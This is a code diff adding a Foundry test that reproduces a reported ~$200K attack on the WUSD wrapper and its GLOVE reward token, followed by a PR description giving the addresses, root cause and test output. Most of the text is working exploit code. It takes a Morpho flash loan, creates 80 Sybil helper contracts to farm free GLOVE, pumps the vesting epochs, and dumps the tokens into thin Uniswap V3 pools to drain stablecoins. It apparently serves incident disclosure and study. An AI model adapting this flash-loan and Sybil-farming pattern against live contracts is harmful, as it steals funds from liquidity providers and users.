+    // GLOVE credited to this fresh address can only be moved by THIS address (the credit
+    // ledger does not travel with a plain transfer), so each helper dumps its own GLOVE.
+    // Sell the full GLOVE balance (token0) into `pool` for its stablecoin (token1 -> recipient).
+    function dumpGlove(
+        address pool,
+        address recipient
+    ) external {
+        uint256 amt = GLOVE.balanceOf(address(this));
+        if (amt > 0) {
+            IV3Pool(pool).swap(recipient, true, int256(amt), 4_295_128_739 + 1, "");
+        }
+    }
+
+    function uniswapV3SwapCallback(
+        int256 amount0Delta,
+        int256,
+        bytes calldata
+    ) external {
+        if (amount0Delta > 0) GLOVE.transfer(msg.sender, uint256(amount0Delta)); // pay GLOVE (token0)
+    }
+
+    function sweepUSDT(
+        address to
+    ) external {
+        uint256 b = USDT.balanceOf(address(this));
+        if (b > 0) _usdtCall(abi.encodeWithSelector(IERC20.transfer.selector, to, b));
+    }
+}
+
+contract WUSDExploitTest is Test {
+    IWUSD constant WUSD = IWUSD(0x068E3563b1c19590F822c0e13445c4FA1b9EEFa5);
+    IGlove constant GLOVE = IGlove(0x70c5f366dB60A2a0C59C4C24754803Ee47Ed7284);
+    IERC20 constant USDT = IERC20(0xdAC17F958D2ee523a2206206994597C13D831ec7);
+    IERC20 constant USDC = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
+    IV3Pool constant POOL_USDC = IV3Pool(0xB89F65D6c7d33A35Da7C01934e310a6f40E18A1f);
+    IV3Pool constant POOL_USDT = IV3Pool(0xa2Bd1A142ff49131B8CC70A332bdA0125018c324);
+
+    IMorphoBuleFlashLoan constant MORPHO = IMorphoBuleFlashLoan(0xBBBBBbbBBb9cC5e90e3b3Af64bdAF62C37EEFFCb);
+
+    uint256 constant WRAP_USDT = 100_000e6; // 100,000 USDT -> 100,000 WUSD, max-caps the GLOVE reward
+    uint256 constant FUND_USDT = 101_000e6; // wrap pulls amount + 1% fee
+
+    uint256 constant N_FARM = 80; // fresh Sybil identities (the real campaign used 80 per tx)
+    uint256 constant N_PUMP = 101; // extra wrap/unwrap cycles to drive >=100 global epochs (vesting)
+
+    uint256 constant ATTACK_BLOCK = 25_170_426;
+
+    function setUp() public {
+        vm.createSelectFork("mainnet", ATTACK_BLOCK - 1);
+        vm.label(address(WUSD), "WUSD");
+        vm.label(address(GLOVE), "GLOVE");
+        vm.label(address(USDT), "USDT");
+        vm.label(address(USDC), "USDC");
+        vm.label(address(POOL_USDC), "V3_GLO_USDC");
+        vm.label(address(POOL_USDT), "V3_GLO_USDT");
+    }
+
+    // ---------------------------------------------------------------------
+    // Recon: confirm pool prices + the wrap->GLOVE->vesting mechanics.
+    // ---------------------------------------------------------------------
+    function testRecon() public {
+        console.log("=== GLO/USDC pool ===");
+        console.log("token0 :", POOL_USDC.token0());
+        console.log("token1 :", POOL_USDC.token1());
+        console.log("fee    :", POOL_USDC.fee());
+        console.log("GLO  reserve:", GLOVE.balanceOf(address(POOL_USDC)) / 1e18);
+        console.log("USDC reserve:", USDC.balanceOf(address(POOL_USDC)) / 1e6);
+        console.log("=== GLO/USDT pool ===");
+        console.log("token0 :", POOL_USDT.token0());
+        console.log("fee    :", POOL_USDT.fee());
+        console.log("GLO  reserve:", GLOVE.balanceOf(address(POOL_USDT)) / 1e18);
+        console.log("USDT reserve:", USDT.balanceOf(address(POOL_USDT)) / 1e6);
+
+        // spot price from slot0: price(token0=GLO in token1=USDC) = (sqrtP^2 / 2^192) * 10^(18-6)
+        (uint160 sp,,,,,,) = POOL_USDC.slot0();
+        uint256 priceUsdcPerGlo = (uint256(sp) * uint256(sp) * 1e12) >> 192; // USDC(6dec) per 1 GLO, scaled 1e6
+        console.log("GLO spot price (USDC, 1e6):", priceUsdcPerGlo);
+
+        // one fresh helper wraps 100k -> should mint ~2 creditless GLOVE
+        Wrapper w = new Wrapper();
+        deal(address(USDT), address(w), FUND_USDT);
+        console.log("USDT funded to wrapper:", USDT.balanceOf(address(w)) / 1e6);
+        w.wrap(WRAP_USDT);
+        console.log("\n=== after single fresh wrap ===");
+        console.log("WUSD balance       :", WUSD.balanceOf(address(w)) / 1e18);
+        console.log("GLOVE balance      :", GLOVE.balanceOf(address(w)));
+        console.log("GLOVE creditlessOf :", GLOVE.creditlessOf(address(w)));
+
+        // pump epochs forward, then full-unwrap to vest creditless -> credited
+        Wrapper pump = new Wrapper();
+        deal(address(USDT), address(pump), 400_000e6);
+        for (uint256 i = 0; i < 101; i++) {
+            pump.wrap(WRAP_USDT);
+            pump.unwrapAll();
+        }
+        w.unwrapAll();
+        console.log("\n=== after 101-epoch pump + full unwrap (vested) ===");
+        console.log("GLOVE balance      :", GLOVE.balanceOf(address(w)));
+        console.log("GLOVE creditlessOf :", GLOVE.creditlessOf(address(w)));
+        console.log("USDT recovered     :", USDT.balanceOf(address(w)) / 1e6);
+    }
+
+    // ---------------------------------------------------------------------
+    // Full exploit: Morpho flash loan -> Sybil-farm + vest GLOVE -> dump into
+    // the GLO/USDC and GLO/USDT V3 pools -> repay -> measure result.
+    // ---------------------------------------------------------------------
+    uint256 private feeCapital; // attacker's own USDT, used only to pay WUSD's 1% wrap fee
+    uint256 private gloveFarmed;
+    uint256 private usdcDrained;
+    uint256 private usdtDrained;
+
+    function testExploit() public {
+        // The attacker seeds their own USDT to cover WUSD's unavoidable 1% wrap fee.
+        // (The Morpho flash loan below is pure working capital and is fully recovered.)
+        feeCapital = 250_000e6;
+        deal(address(USDT), address(this), feeCapital);
+
+        uint256 poolUSDCBefore = USDC.balanceOf(address(POOL_USDC));
+        uint256 poolUSDTBefore = USDT.balanceOf(address(POOL_USDT));
+
+        // Peak working capital = N_FARM positions held open simultaneously + a pump buffer.
+        uint256 loan = N_FARM * FUND_USDT + 250_000e6;
+        console.log("Morpho USDT flash loan      :", loan / 1e6);
+        MORPHO.flashLoan(address(USDT), loan, "");
+
+        usdcDrained = poolUSDCBefore - USDC.balanceOf(address(POOL_USDC));
+        usdtDrained = poolUSDTBefore - USDT.balanceOf(address(POOL_USDT));
+        uint256 feesPaid = (N_FARM + N_PUMP) * 1000e6;
+        uint256 endUSDT = USDT.balanceOf(address(this));
+        uint256 endUSDC = USDC.balanceOf(address(this));
+
+        console.log("\n=============== RESULT ===============");
+        console.log("Fresh Sybil addresses          :", N_FARM);
+        console.log("GLOVE incentives minted for free:", gloveFarmed / 1e18);
+        console.log("USDC drained from GLO/USDC LP   :", usdcDrained / 1e6);
+        console.log("USDT drained from GLO/USDT LP   :", usdtDrained / 1e6);
+        console.log("Stablecoins drained from LPs    :", (usdcDrained + usdtDrained) / 1e6);
+        console.log("WUSD 1%% wrap fee paid (cost)    :", feesPaid / 1e6);
+        console.log("Attacker end USDT (post-repay)  :", endUSDT / 1e6);
+        console.log("Attacker end USDC               :", endUSDC / 1e6);
+        console.log("Attacker net vs own fee-capital :", _signed(int256(endUSDT + endUSDC) - int256(feeCapital)));
+        console.log("(Headline ~$200K incident = free GLOVE emissions + LP drain across the campaign;");
+        console.log(" the 1%% WUSD wrap fee is the attacker's cost and bounds per-batch margin.)");
+
+        // The security finding: unlimited free GLOVE to fresh Sybil addresses, and a real LP drain.
+        assertEq(gloveFarmed, N_FARM * 2e18, "every fresh address must farm 2 free GLOVE");
+        assertGt(usdcDrained + usdtDrained, 0, "no stablecoins drained from LPs");
+    }
+
+    function onMorphoFlashLoan(
+        uint256 assets,
+        bytes calldata
+    ) external {
+        require(msg.sender == address(MORPHO), "only Morpho");
+
+        // --- Step 1: Sybil-farm. Each fresh helper wraps 100k WUSD -> 2 free GLOVE (no Sybil
+        //     resistance whatsoever), and each wrap advances one global epoch. Positions stay
+        //     OPEN (USDT locked in WUSD) so epochs can elapse before we unwrap & vest.
+        Wrapper[] memory farms = new Wrapper[](N_FARM);
+        for (uint256 i = 0; i < N_FARM; i++) {
+            farms[i] = new Wrapper();
+            _usdtTransfer(address(farms[i]), FUND_USDT);
+            farms[i].wrap(WRAP_USDT);
+            require(GLOVE.balanceOf(address(farms[i])) == 2e18, "fresh address should mint 2 GLOVE");
+        }
+
+        // --- Step 2: pump extra epochs so every farmed position reaches >=100 epochs of
+        //     vesting. One pump helper recycles its principal, paying only the 1% fee.
+        Wrapper pump = new Wrapper();
+        _usdtTransfer(address(pump), 250_000e6);
+        for (uint256 i = 0; i < N_PUMP; i++) {
+            pump.wrap(WRAP_USDT);
+            pump.unwrapAll();
+        }
+        pump.sweepUSDT(address(this));
+
+        // --- Step 3: unwrap each farm in full -> _deglove() vests its creditless GLOVE into
+        //     transferable credited GLOVE and returns the USDT principal; then the helper
+        //     dumps its own GLOVE into a V3 pool (proceeds -> attacker), and returns leftover USDT.
+        for (uint256 i = 0; i < N_FARM; i++) {
+            farms[i].unwrapAll();
+            gloveFarmed += GLOVE.balanceOf(address(farms[i]));
+            // split the dump across both thin pools
+            farms[i].dumpGlove(i % 2 == 0 ? address(POOL_USDC) : address(POOL_USDT), address(this));
+            farms[i].sweepUSDT(address(this));
+        }
+
+        // --- Step 4: repay the Morpho flash loan (pulled back via transferFrom).
+        _usdtCall(abi.encodeWithSelector(IERC20.approve.selector, address(MORPHO), assets));
+    }
+
+    function _signed(
+        int256 v
+    ) internal pure returns (string memory) {
+        if (v >= 0) return string.concat("+", vm.toString(uint256(v) / 1e6));
+        return string.concat("-", vm.toString(uint256(-v) / 1e6));
+    }
+
+    function _usdtTransfer(
+        address to,
+        uint256 amount
+    ) internal {
+        _usdtCall(abi.encodeWithSelector(IERC20.transfer.selector, to, amount));
+    }
+
+    function _usdtCall(
+        bytes memory data
+    ) internal {
+        (bool ok,) = address(USDT).call(data);
+        require(ok, "USDT call failed");
+    }
+}


### PR DESCRIPTION
## KeyInfo
- Total Lost: ~$200K USD (GLOVE emissions + Uniswap V3 LP drain)
- Attacker: 0x88329A09428778F62BC0C8BAac0997864E5a57f8
- Vulnerable Contract: 0x068E3563b1c19590F822c0e13445c4FA1b9EEFa5 (WUSD - _englove)
- Reward Token: 0x70c5f366db60a2a0c59c4c24754803ee47ed7284 (GLOVE/GLO)
- Attack Tx: 0x2051c1f8d43730c41cc353b5dffd8cc59f96cb1ca56fdce4b28fb127bdb37712
- Chain: Ethereum | Block: 25170426 | Date: May 25, 2026

## Root Cause
WUSD._englove() mints ~2 free GLOVE to any address wrapping >= 100k WUSD. No per-address cooldown, no Sybil resistance. A fresh address always holds 0 GLOVE < _MAX_GLOVE (2e18), so it always qualifies. Attacker uses Morpho flash loan + 80 fresh Sybil helpers to harvest 160 free GLOVE per tx, then dumps into thin Uniswap V3 GLO pools.

## Test Output
forge test --contracts src/test/2026-05/WUSD_exp.sol -vvv

Fresh Sybil addresses: 80
GLOVE incentives minted for free: 160
USDC drained from GLO/USDC LP: 13891
USDT drained from GLO/USDT LP: 13966
[PASS] testExploit() (gas: 72571285)
[PASS] testRecon()

## References
https://x.com/exvulsec/status/2058803971947385330